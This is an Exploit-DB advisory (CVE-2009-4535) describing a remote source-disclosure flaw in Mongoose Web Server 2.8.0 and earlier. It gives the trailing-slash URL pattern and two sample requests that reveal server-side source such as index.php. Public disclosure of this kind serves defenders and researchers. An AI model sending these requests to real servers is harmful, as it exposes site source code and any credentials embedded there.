Mongoose Web Server 2.8.0 Source Disclosure

2009-10-23T00:00:00
ID EDB-ID:9897
Type exploitdb
Reporter Dr_IDE
Modified 2009-10-23T00:00:00

Description

Mongoose Web Server 2.8.0 Source Disclosure. CVE-2009-4535. Webapps exploit for php platform

                                        
                                            #######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]